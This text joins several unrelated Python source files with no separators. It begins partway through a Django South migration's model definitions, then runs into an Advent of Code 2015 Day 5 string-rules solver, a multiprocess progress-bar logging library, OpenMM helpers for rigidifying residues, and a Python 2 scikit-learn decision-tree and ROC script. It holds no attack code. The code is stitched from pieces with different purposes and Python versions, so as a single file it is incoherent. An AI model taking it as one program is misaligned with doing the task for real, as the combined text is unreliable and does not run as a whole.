            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.User']"})
        },
        u'pa.category': {
            'Meta': {'object_name': 'Category'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'grouping': ('django.db.models.fields.CharField', [], {'default': "'d'", 'max_length': '15'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'reporting_period': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.ReportingPeriod']"})
        },
        u'pa.profession': {
            'Meta': {'object_name': 'Profession'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
        },
        u'pa.reportingperiod': {
            'Meta': {'object_name': 'ReportingPeriod'},
            'end_date': ('django.db.models.fields.DateTimeField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
            'slots_per_hour': ('django.db.models.fields.IntegerField', [], {}),
            'start_date': ('django.db.models.fields.DateTimeField', [], {}),
            'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['pa.User']", 'symmetrical': 'False'})
        },
        u'pa.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'profession': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Profession']", 'null': 'True', 'blank': 'True'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        }
    }

    complete_apps = ['pa']
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Advent of Code 2015 from http://adventofcode.com/2015/day/5
Author: James Walker
Copyrighted 2017 under the MIT license:
  http://www.opensource.org/licenses/mit-license.php
Execution:
  python advent_of_code_2015_day_05.py

--- Day 5: Doesn't He Have Intern-Elves For This? ---

  Santa needs help figuring out which strings in his text file are naughty or
  nice.
  
  A nice string is one with all of the following properties:
    It contains at least three vowels (aeiou only), like aei, xazegov, or 
      aeiouaeiouaeiou.
    It contains at least one letter that appears twice in a row, like xx,
      abcdde (dd), or aabbccdd (aa, bb, cc, or dd).
    It does not contain the strings ab, cd, pq, or xy, even if they are part of
      one of the other requirements.

  For example:
    ugknbfddgicrmopn is nice because it has at least three vowels
      (u...i...o...), a double letter (...dd...), and none of the disallowed
      substrings.
    aaa is nice because it has at least three vowels and a double letter, even
      though the letters used by different rules overlap.
    jchzalrnumimnmhp is naughty because it has no double letter.
    haegwjzuvuyypxyu is naughty because it contains the string xy.
    dvszwmarrgswjxmb is naughty because it contains only one vowel.

  How many strings are nice?
    Answer: 258

--- Day 5: Part Two ---

  Realizing the error of his ways, Santa has switched to a better model of
  determining whether a string is naughty or nice. None of the old rules apply,
  as they are all clearly ridiculous. Now, a nice string is one with all of the
  following properties:

    It contains a pair of any two letters that appears at least twice in the
      string without overlapping, like xyxy (xy) or aabcdefgaa (aa), but not
      like aaa (aa, but it overlaps).
    It contains at least one letter which repeats with exactly one letter
      between them, like xyx, abcdefeghi (efe), or even aaa.

  For example:
    qjhvhtzxzqqjkmpb is nice because is has a pair that appears twice (qj) and
      a letter that repeats with exactly one letter between them (zxz).
    xxyxx is nice because it has a pair that appears twice and a letter that
      repeats with one between, even though the letters used by each rule
      overlap.
    uurcxstgmygtbstg is naughty because it has a pair (tg) but no repeat with a
      single letter between them.
    ieodomkazucvgmuy is naughty because it has a repeating letter with one
      between (odo), but no pair that appears twice.

  How many strings are nice under these new rules?
    Answer: 53
"""


import collections
import os
import re
import sys


# Bundles one puzzle input with its expected nice-string counts for parts 1 and 2.
TestCase = collections.namedtuple('TestCase', 'input expected1 expected2')


class Advent_Of_Code_2015_Solver_Day05(object):
    """Advent of Code 2015 Day 5: Doesn't He Have Intern-Elves For This?"""

    def __init__(self, file_name=None):
        """Create a solver; `file_name` is the puzzle-input path (None = test mode)."""
        self._file_name = file_name
        self._puzzle_input = None
        self._solved_output = (
            "The text file had {0} nice strings using the original rules\n"
            "and it had {1} nice strings using the new rules."
        )
        # Raw strings below: '\w' in a plain string literal is an invalid
        # escape sequence (DeprecationWarning today, an error in future
        # Python versions). The compiled patterns are unchanged.
        self.__regex_vowels = re.compile(r'[aeiou]')
        self.__regex_double_char = re.compile(r'(\w)\1+')       # letter doubled back-to-back
        self.__regex_naughty = re.compile(r'ab|cd|pq|xy')       # forbidden substrings (part 1)
        self.__regex_double_pair = re.compile(r'(\w{2})\w*\1')  # two-letter pair appearing twice
        self.__regex_triplet = re.compile(r'(\w)\w\1')          # repeat with one letter between

    def _load_puzzle_file(self):
        """Read the puzzle input lines from self._file_name; exit(1) on I/O failure."""
        filePath = "{dir}/{f}".format(dir=os.getcwd(), f=self._file_name)
        try:
            with open(filePath, mode='r') as puzzle_file:
                self._puzzle_input = puzzle_file.readlines()
        except IOError as err:
            errorMsg = (
                "ERROR: Failed to read the puzzle input from file '{file}'\n"
                "{error}"
            )
            print(errorMsg.format(file=self._file_name, error=err))
            # sys.exit instead of the site-installed exit() helper, which is
            # not guaranteed to exist (e.g. under python -S).
            sys.exit(1)

    def __is_nice_string_using_old_rules(self, string):
        """Part 1: no naughty substring, at least 3 vowels, and a doubled letter."""
        return (self.__regex_naughty.search(string) is None
            and len(self.__regex_vowels.findall(string)) > 2
            and self.__regex_double_char.search(string))

    def __is_nice_string_using_new_rules(self, string):
        """Part 2: a non-overlapping repeated pair and an x?x triplet."""
        return (self.__regex_double_pair.search(string)
            and self.__regex_triplet.search(string))

    def _solve_puzzle_parts(self):
        """Count nice strings under both rule sets; returns (old_count, new_count)."""
        old_nice_count = 0
        new_nice_count = 0
        for string in self._puzzle_input:
            if not string:
                continue
            if self.__is_nice_string_using_old_rules(string):
                old_nice_count += 1
            if self.__is_nice_string_using_new_rules(string):
                new_nice_count += 1
        return (old_nice_count, new_nice_count)

    def get_puzzle_solution(self, alt_input=None):
        """Solve the puzzle and return the formatted answer string.

        :param alt_input: optional list of strings to use instead of the file.
        """
        if alt_input is None:
            self._load_puzzle_file()
        else:
            self._puzzle_input = alt_input
        old_nice_count, new_nice_count = self._solve_puzzle_parts()
        return self._solved_output.format(old_nice_count, new_nice_count)

    def _run_test_case(self, test_case):
        """Run one TestCase and print pass/fail (plus output on failure)."""
        correct_output = self._solved_output.format(
            test_case.expected1,
            test_case.expected2
        )
        test_output = self.get_puzzle_solution(test_case.input)
        if correct_output == test_output:
            print("Test passed for input '{0}'".format(test_case.input))
        else:
            print("Test failed for input '{0}'".format(test_case.input))
            print(test_output)

    def run_test_cases(self):
        """Run the example inputs from the puzzle statement."""
        print("No Puzzle Input for {puzzle}".format(puzzle=self.__doc__))
        print("Running Test Cases...")
        self._run_test_case(TestCase(['ugknbfddgicrmopn'], 1, 0))
        self._run_test_case(TestCase(['aaa'], 1, 0))
        self._run_test_case(TestCase(['jchzalrnumimnmhp'], 0, 0))
        self._run_test_case(TestCase(['haegwjzuvuyypxyu'], 0, 0))
        self._run_test_case(TestCase(['dvszwmarrgswjxmb'], 0, 0))
        self._run_test_case(TestCase(['xyxy'], 0, 1))
        self._run_test_case(TestCase(['aabcdefgaa'], 0, 0))
        self._run_test_case(TestCase(['qjhvhtzxzqqjkmpb'], 0, 1))
        self._run_test_case(TestCase(['xxyxx'], 0, 1))
        self._run_test_case(TestCase(['uurcxstgmygtbstg'], 0, 0))
        self._run_test_case(TestCase(['ieodomkazucvgmuy'], 0, 0))
        self._run_test_case(TestCase(['aaccacc'], 1, 1))


if __name__ == '__main__':
    # With a file argument, solve that puzzle input; with no argument the
    # sys.argv[1] access raises IndexError and we fall back to the self-tests.
    try:
        day05_solver = Advent_Of_Code_2015_Solver_Day05(sys.argv[1])
        print(day05_solver.__doc__)
        print(day05_solver.get_puzzle_solution())
    except IndexError:
        Advent_Of_Code_2015_Solver_Day05().run_test_cases()

#!/bin/env/python
# coding: utf-8

import logging
import os
import time
import uuid
from logging import Formatter
from logging.handlers import RotatingFileHandler
from multiprocessing import Queue
from time import strftime

import dill

from .commands import *
from .processing import MultiprocessingLogger


class TaskProgress(object):
    """
    Container for one progress bar: its numeric state plus the options that
    control how the logger renders it on screen. The logger iterates over
    TaskProgress objects to draw the bars.
    """

    def __init__(self,
                 total,
                 prefix='',
                 suffix='',
                 decimals=0,
                 bar_length=60,
                 keep_alive=False,
                 display_time=False):
        """
        Create a new progress bar description.
        :param total:        Total number of iterations for this bar.
        :param prefix:       [Optional] Text displayed on the left of the bar.
                             Bars always stay left-aligned at the shortest
                             possible position.
        :param suffix:       [Optional] Text displayed on the right of the bar.
        :param decimals:     [Optional] Number of decimals for the percentage.
        :param bar_length:   [Optional] Graphical bar width, in characters.
        :param keep_alive:   [Optional] Keep the bar on screen forever once
                             completed instead of letting it vanish.
        :param display_time: [Optional] Show time since the progress began:
                             in parentheses while running, in brackets once
                             completed.
        """
        super(TaskProgress, self).__init__()

        # Current progress, in iteration units (not percent).
        self.progress = 0

        # Chronometer state. Timestamps are in milliseconds. The bar may
        # vanish later than the timeout since redraws depend on chrono AND
        # method calls.
        self.timeout_chrono = None
        self.begin_time = None
        self.end_time = None
        self.elapsed_time_at_end = None

        # Rendering options.
        self.keep_alive = keep_alive
        self.display_time = display_time
        self.total = total
        self.prefix = prefix
        self.suffix = suffix
        self.decimals = decimals
        self.bar_length = bar_length

    def set_progress(self, progress):
        """
        Update the current progress, in iteration units (not percent).
        Values above 'total' are clamped to 'total'; otherwise negative
        values are clamped to 0.
        :param progress: New progress value in iteration units.
        :return:         True when the stored progress actually changed.
        """
        if progress > self.total:
            clamped = self.total
        elif progress < 0:
            clamped = 0
        else:
            clamped = progress

        # Reaching completion stops the chrono when time display is enabled.
        if clamped == self.total and self.display_time:
            self.end_time = time.time() * 1000

            # Instant completion: the chrono never started, so align both ends.
            if not self.begin_time:
                self.begin_time = self.end_time

        changed = self.progress != clamped
        if changed:
            self.progress = clamped

        return changed


class FancyLogger(object):
    """
    Defines a multiprocess logger object. Logger uses a redraw rate because of console flickering. That means it will
    not draw new messages or progress at the very time they are being logged but their timestamp will be captured at the
    right time. Logger will redraw at a given time period AND when new messages or progress are logged.
    If you still want to force redraw immediately (may produce flickering) then call 'flush' method.
    Logger uses one file handler and then uses standard output (stdout) to draw on screen.
    """

    queue = None
    "Handles all messages and progress to be sent to the logger process."

    default_message_number = 20
    "Default value for the logger configuration."
    default_exception_number = 5
    "Default value for the logger configuration."
    default_permanent_progressbar_slots = 0
    "Default value for the logger configuration."
    default_redraw_frequency_millis = 500
    "Default value for the logger configuration."
    default_level = logging.INFO
    "Default value for the logger configuration."
    default_task_millis_to_removal = 500
    "Default value for the logger configuration."
    default_console_format_strftime = '%d %B %Y %H:%M:%S'
    "Default value for the logger configuration."
    default_console_format = '{T} [{L}]'
    "Default value for the logger configuration."
    default_file_handlers = []
    "Default value for the logger configuration. Filled in constructor."

    def __init__(self,
                 message_number=default_message_number,
                 exception_number=default_exception_number,
                 permanent_progressbar_slots=default_permanent_progressbar_slots,
                 redraw_frequency_millis=default_redraw_frequency_millis,
                 console_level=default_level,
                 task_millis_to_removal=default_task_millis_to_removal,
                 console_format_strftime=default_console_format_strftime,
                 console_format=default_console_format,
                 file_handlers=None,
                 application_name=None):
        """
        Initializes a new logger and starts its process immediately using given configuration.
        :param message_number:              [Optional] Number of simultaneously displayed messages below progress bars.
        :param exception_number:            [Optional] Number of simultaneously displayed exceptions below messages.
        :param permanent_progressbar_slots: [Optional] The amount of vertical space (bar slots) to keep at all times,
                                            so the message logger will not move anymore if the bar number is equal or
                                            lower than this parameter.
        :param redraw_frequency_millis:     [Optional] Minimum time lapse in milliseconds between two redraws. It may be
                                            more because the redraw rate depends upon time AND method calls.
        :param console_level:               [Optional] The logging level (from standard logging module).
        :param task_millis_to_removal:      [Optional] Minimum time lapse in milliseconds at maximum completion before
                                            a progress bar is removed from display. The progress bar may vanish at a
                                            further time as the redraw rate depends upon time AND method calls.
        :param console_format_strftime:     [Optional] Specify the time format for console log lines using python
                                            strftime format. Defaults to format: '29 november 2016 21:52:12'.
        :param console_format:              [Optional] Specify the format of the console log lines. There are two
                                            variables available: {T} for timestamp, {L} for level. Will then add some
                                            tabulations in order to align text beginning for all levels.
                                            Defaults to format: '{T} [{L}]'
                                            Which will produce: '29 november 2016 21:52:12 [INFO]      my log text'
                                                                '29 november 2016 21:52:13 [WARNING]   my log text'
                                                                '29 november 2016 21:52:14 [DEBUG]     my log text'
        :param file_handlers:               [Optional] Specify the file handlers to use. Each file handler will use its
                                            own regular formatter and level. Console logging is distinct from file
                                            logging. Console logging uses custom stdout formatting, while file logging
                                            uses regular python logging rules. All handlers are permitted except
                                            StreamHandler if used with stdout or stderr which are reserved by this
                                            library for custom console output.
        :param application_name:            [Optional] Used only if 'file_handlers' parameter is ignored. Specifies the
                                            application name to use to format the default file logger using format:
                                            application_%Y-%m-%d_%H-%M-%S.log
        """
        super(FancyLogger, self).__init__()

        # Define default file handlers
        if not file_handlers:
            if not application_name:
                app_name = 'application'
            else:
                app_name = application_name

            # BUGFIX: 'default_file_handlers' is a class-level list shared by
            # all instances. The previous code appended a new handler on every
            # construction, so creating several FancyLogger objects piled up
            # duplicate file handlers (and duplicated every log line). Build
            # the default handler only once.
            if not self.default_file_handlers:
                handler = RotatingFileHandler(filename=os.path.join(os.getcwd(), '{}_{}.log'
                                                                    .format(app_name, strftime('%Y-%m-%d_%H-%M-%S'))),
                                              encoding='utf8',
                                              maxBytes=5242880,  # 5 MB
                                              backupCount=10,
                                              delay=True)
                handler.setLevel(logging.INFO)
                handler.setFormatter(fmt=Formatter(fmt='%(asctime)s [%(levelname)s]\t%(message)s',
                                                   datefmt=self.default_console_format_strftime))
                self.default_file_handlers.append(handler)

            file_handlers = self.default_file_handlers

        if not self.queue:
            self.queue = Queue()
            self.process = MultiprocessingLogger(queue=self.queue,
                                                 console_level=console_level,
                                                 message_number=message_number,
                                                 exception_number=exception_number,
                                                 permanent_progressbar_slots=permanent_progressbar_slots,
                                                 redraw_frequency_millis=redraw_frequency_millis,
                                                 task_millis_to_removal=task_millis_to_removal,
                                                 console_format_strftime=console_format_strftime,
                                                 console_format=console_format,
                                                 file_handlers=file_handlers)
            self.process.start()

    def flush(self):
        """
        Flushes the remaining messages and progress bars state by forcing redraw. Can be useful if you want to be sure
        that a message or progress has been updated in display at a given moment in code, like when you are exiting an
        application or doing some kind of synchronized operations.
        """
        self.queue.put(dill.dumps(FlushCommand()))

    def terminate(self):
        """
        Tells the logger process to exit immediately. If you do not call 'flush' method before, you may lose some
        messages of progresses that have not been displayed yet. This method blocks until logger process has stopped.
        """
        self.queue.put(dill.dumps(ExitCommand()))

        if self.process:
            self.process.join()

    def set_configuration(self,
                          message_number=default_message_number,
                          exception_number=default_exception_number,
                          permanent_progressbar_slots=default_permanent_progressbar_slots,
                          redraw_frequency_millis=default_redraw_frequency_millis,
                          console_level=default_level,
                          task_millis_to_removal=default_task_millis_to_removal,
                          console_format_strftime=default_console_format_strftime,
                          console_format=default_console_format,
                          file_handlers=default_file_handlers):
        """
        Defines the current configuration of the logger. Can be used at any moment during runtime to modify the logger
        behavior.
        :param message_number:              [Optional] Number of simultaneously displayed messages below progress bars.
        :param exception_number:            [Optional] Number of simultaneously displayed exceptions below messages.
        :param permanent_progressbar_slots: [Optional] The amount of vertical space (bar slots) to keep at all times,
                                            so the message logger will not move anymore if the bar number is equal or
                                            lower than this parameter.
        :param redraw_frequency_millis:     [Optional] Minimum time lapse in milliseconds between two redraws. It may be
                                            more because the redraw rate depends upon time AND method calls.
        :param console_level:               [Optional] The logging level (from standard logging module).
        :param task_millis_to_removal:      [Optional] Minimum time lapse in milliseconds at maximum completion before
                                            a progress bar is removed from display. The progress bar may vanish at a
                                            further time as the redraw rate depends upon time AND method calls.
        :param console_format_strftime:     [Optional] Specify the time format for console log lines using python
                                            strftime format. Defaults to format: '29 november 2016 21:52:12'.
        :param console_format:              [Optional] Specify the format of the console log lines. There are two
                                            variables available: {T} for timestamp, {L} for level. Will then add some
                                            tabulations in order to align text beginning for all levels.
                                            Defaults to format: '{T} [{L}]'
                                            Which will produce: '29 november 2016 21:52:12 [INFO]      my log text'
                                                                '29 november 2016 21:52:13 [WARNING]   my log text'
                                                                '29 november 2016 21:52:14 [DEBUG]     my log text'
        :param file_handlers:               [Optional] Specify the file handlers to use. Each file handler will use its
                                            own regular formatter and level. Console logging is distinct from file
                                            logging. Console logging uses custom stdout formatting, while file logging
                                            uses regular python logging rules. All handlers are permitted except
                                            StreamHandler if used with stdout or stderr which are reserved by this
                                            library for custom console output.
        """
        self.queue.put(dill.dumps(SetConfigurationCommand(task_millis_to_removal=task_millis_to_removal,
                                                          console_level=console_level,
                                                          permanent_progressbar_slots=permanent_progressbar_slots,
                                                          message_number=message_number,
                                                          exception_number=exception_number,
                                                          redraw_frequency_millis=redraw_frequency_millis,
                                                          console_format_strftime=console_format_strftime,
                                                          console_format=console_format,
                                                          file_handlers=file_handlers)))

    def set_level(self,
                  level,
                  console_only=False):
        """
        Defines the logging level (from standard logging module) for log messages.
        :param level:           Level of logging for the file logger.
        :param console_only:    [Optional] If True then the file logger will not be affected.
        """
        self.queue.put(dill.dumps(SetLevelCommand(level=level,
                                                  console_only=console_only)))

    def set_task_object(self,
                        task_id,
                        task_progress_object):
        """
        Defines a new progress bar with the given information using a TaskProgress object.
        :param task_id:                 Unique identifier for this progress bar. Will erase if already existing.
        :param task_progress_object:    TaskProgress object holding the progress bar information.
        """
        self.set_task(task_id=task_id,
                      total=task_progress_object.total,
                      prefix=task_progress_object.prefix,
                      suffix=task_progress_object.suffix,
                      decimals=task_progress_object.decimals,
                      bar_length=task_progress_object.bar_length,
                      keep_alive=task_progress_object.keep_alive,
                      display_time=task_progress_object.display_time)

    def set_task(self,
                 task_id,
                 total,
                 prefix,
                 suffix='',
                 decimals=0,
                 bar_length=60,
                 keep_alive=False,
                 display_time=False):
        """
        Defines a new progress bar with the given information.
        :param task_id:         Unique identifier for this progress bar. Will erase if already existing.
        :param total:           The total number of iteration for this progress bar.
        :param prefix:          The text that should be displayed at the left side of the progress bar. Note that
                                progress bars will always stay left-aligned at the shortest possible.
        :param suffix:          [Optional] The text that should be displayed at the very right side of the progress bar.
        :param decimals:        [Optional] The number of decimals to display for the percentage.
        :param bar_length:      [Optional] The graphical bar size displayed on screen. Unit is character.
        :param keep_alive:      [Optional] Specify whether the progress bar should stay displayed forever once completed
                                or if it should vanish.
        :param display_time:    [Optional] Specify whether the duration since the progress has begun should be
                                displayed. Running time will be displayed between parenthesis, whereas it will be
                                displayed between brackets when the progress has completed.
        """
        self.queue.put(dill.dumps(NewTaskCommand(task_id=task_id,
                                                 task=TaskProgress(total,
                                                                   prefix,
                                                                   suffix,
                                                                   decimals,
                                                                   bar_length,
                                                                   keep_alive,
                                                                   display_time))))

    def update(self,
               task_id,
               progress):
        """
        Defines the current progress for this progress bar id in iteration units (not percent).
        If the given id does not exist or the given progress is identical to the current, then does nothing.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param task_id:     Unique identifier for this progress bar. Will erase if already existing.
        :param progress:    Current progress in iteration units regarding its total (not percent).
        """
        self.queue.put(dill.dumps(UpdateProgressCommand(task_id=task_id,
                                                        progress=progress)))

    def debug(self, text):
        """
        Posts a debug message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.DEBUG)))

    def info(self, text):
        """
        Posts an info message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.INFO)))

    def warning(self, text):
        """
        Posts a warning message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.WARNING)))

    def error(self, text):
        """
        Posts an error message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.ERROR)))

    def critical(self, text):
        """
        Posts a critical message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.CRITICAL)))

    def throw(self, stacktrace, process_title=None):
        """
        Sends an exception to the logger so it can display it as a special message. Prevents console refresh cycles from
        hiding exceptions that could be thrown by processes.
        :param stacktrace:      Stacktrace string as returned by 'traceback.format_exc()' in an 'except' block.
        :param process_title:   [Optional] Define the current process title to display into the logger for this
                                exception.
        """
        self.queue.put(dill.dumps(StacktraceCommand(pid=os.getpid(),
                                                    stacktrace=stacktrace,
                                                    process_title=process_title)))

    # --------------------------------------------------------------------
    # Iterator implementation
    def progress(self,
                 enumerable,
                 task_progress_object=None):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :param enumerable:              Collection to iterate over.
        :param task_progress_object:    [Optional] TaskProgress object holding the progress bar information.
        :return:                        The logger instance.
        """
        self.list = enumerable
        self.list_length = len(enumerable)
        self.task_id = uuid.uuid4()
        self.index = 0

        if task_progress_object:
            # Force total attribute
            task_progress_object.total = self.list_length
        else:
            task_progress_object = TaskProgress(total=self.list_length,
                                                display_time=True,
                                                prefix='Progress')

        # Create a task progress
        self.set_task_object(task_id=self.task_id,
                             task_progress_object=task_progress_object)

        return self

    def __iter__(self):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :return: The logger instance.
        """
        return self

    def __next__(self):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :return: The current object of the iterator.
        """
        if self.index >= self.list_length:
            raise StopIteration
        else:
            self.index += 1
            self.update(task_id=self.task_id,
                        progress=self.index)

            return self.list[self.index - 1]
    # ---------------------------------------------------------------------

from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit

def findForce(system, forcetype, add=True):
  """ Finds a specific force in the system force list - added if not found.

  :param system:    System whose force list is searched (OpenMM System-like).
  :param forcetype: Force class to look for.
  :param add:       If True, create and add the force when it is missing.
  :return:          The matching force instance, or None when absent and
                    'add' is False.
  """
  for force in system.getForces():
    if isinstance(force, forcetype):
      return force
  # Use truthiness instead of '== True' so any truthy value enables adding.
  if add:
    system.addForce(forcetype())
    return findForce(system, forcetype)
  return None

def setGlobalForceParameter(force, key, value):
  """ Set the default value of the global force parameter named 'key'. """
  for index in range(force.getNumGlobalParameters()):
    if force.getGlobalParameterName(index) == key:
      print('setting force parameter', key, '=', value)
      force.setGlobalParameterDefaultValue(index, value)

def atomIndexInResidue(residue):
  """ Return the list of atom indices belonging to the residue. """
  return [atom.index for atom in residue.atoms()]

def getResiduePositions(residue, positions):
  """ Returns array w. atomic positions of residue

  :param residue:   Residue whose atom positions are extracted.
  :param positions: Full position list/array indexable by atom index.
  :return:          numpy array with only this residue's positions.
  """
  # BUGFIX: numpy is not imported at this file's module level, so 'np' was
  # an unresolved name; import it locally to keep the function self-contained.
  import numpy as np
  ndx = atomIndexInResidue(residue)
  return np.array(positions)[ndx]

def uniquePairs(index):
  """ list of unique, internal pairs

  :param index: Sorted atom indices; only the first and last are used to
                span the inclusive range of indices.
  :return:      All unique index pairs (i, j) with i < j within the range.
  """
  # BUGFIX: 'combinations' was never imported in this file; bring it into
  # scope locally so the function works stand-alone.
  from itertools import combinations
  return list(combinations(range(index[0], index[-1] + 1), 2))

def addHarmonicConstraint(harmonicforce, pairlist, positions, threshold, k):
  """ add harmonic bonds between pairs if distance is smaller than threshold """
  print('Constraint force constant =', k)
  for a, b in pairlist:
    separation = unit.norm(positions[a] - positions[b])
    if separation < threshold:
      harmonicforce.addBond(a, b,
          separation.value_in_unit(unit.nanometer),
          k.value_in_unit(unit.kilojoule / unit.nanometer**2 / unit.mole))
      print("added harmonic bond between", a, b, 'with distance', separation)

def addExclusions(nonbondedforce, pairlist):
  """ add nonbonded exclusions between pairs """
  for pair in pairlist:
    nonbondedforce.addExclusion(pair[0], pair[1])

def rigidifyResidue(residue, harmonicforce, positions, nonbondedforce=None,
    threshold=6.0*unit.angstrom, k=2500*unit.kilojoule/unit.nanometer**2/unit.mole):
  """ make residue rigid by adding constraints and nonbonded exclusions

  :param residue:        Residue to rigidify.
  :param harmonicforce:  Harmonic bond force receiving the constraints.
  :param positions:      Atomic positions indexable by atom index.
  :param nonbondedforce: [Optional] Nonbonded force receiving exclusions.
  :param threshold:      [Optional] Max distance for adding a constraint.
  :param k:              [Optional] Harmonic force constant.
  """
  index    = atomIndexInResidue(residue)
  pairlist = uniquePairs(index)
  # BUGFIX: the body referenced undefined globals ('harmonic', 'pdb.positions',
  # 'nonbonded') instead of the function's own parameters, so every call
  # raised NameError. Use the parameters.
  addHarmonicConstraint(harmonicforce, pairlist, positions, threshold, k)
  if nonbondedforce is not None:
    for i, j in pairlist:
      print('added nonbonded exclusion between', i, j)
      nonbondedforce.addExclusion(i, j)


from array import array

import numpy as np
import matplotlib.pyplot as plt

from sklearn import datasets
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import classification_report, roc_auc_score, roc_curve

from sklearn import tree
import cPickle

# NOTE(review): Python 2 script (print statements, cPickle). Loads a prepared
# electron dataset, optionally fits a depth-3 decision tree (or reloads a
# pickled one), scores held-out events and draws a ROC curve.
# The input path is machine-specific — TODO parameterize.
data = np.load('/Users/musthero/Documents/Yura/Applications/tmva_local/output_electrons_fullsim_v5_VeryTightLH_20per.npz')

# Train on the first 2000, test on the rest
X_train, y_train = data['data_training'], data['isprompt_training'].ravel()
# Only the first 1000 testing events are evaluated here.
X_test, y_test = data['data_testing'][0:1000], data['isprompt_testing'][0:1000].ravel()

# sklearn
dt = DecisionTreeClassifier(max_depth=3,
                            min_samples_leaf=100)
                            #min_samples_leaf=0.05*len(X_train))

# Toggle: True refits and pickles the tree; False loads the pickle from disk.
doFit = False

if doFit:
    print "Performing DecisionTree fit..."
    dt.fit(X_train, y_train)

    import cPickle
    with open('electrons_toTMVA.pkl', 'wb') as fid:
        cPickle.dump(dt, fid)
else:
    print "Loading DecisionTree..."
    # load it again
    with open('electrons_toTMVA.pkl', 'rb') as fid:
        dt = cPickle.load(fid)

#sk_y_predicted = dt.predict(X_test)
#sk_y_predicted = dt.predict_proba(X_test)[:, 1]
# ROC score = predicted probability of the positive (prompt) class.
sk_y_predicted = dt.predict_proba(X_test)[:, 1]
predictions = dt.predict(X_test)
print predictions
print y_test


# Draw ROC curve
fpr, tpr, _ = roc_curve(y_test, sk_y_predicted)

plt.figure()
plt.plot(fpr, tpr, label='ROC curve of class')

# Diagonal = random-guess baseline.
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")

plt.savefig("output_fullsim_v5_electrons_roc_20per_DecisionTree.png", dpi=144)

# Export the fitted tree for graphviz visualization.
tree.export_graphviz(dt, out_file='dt_viz.dot')

# Save to file fpr, tpr
#np.savez('output_fullsim_v3_electrons_fpr_tpr_10per.npz', 
#    fpr=fpr, tpr=tpr)
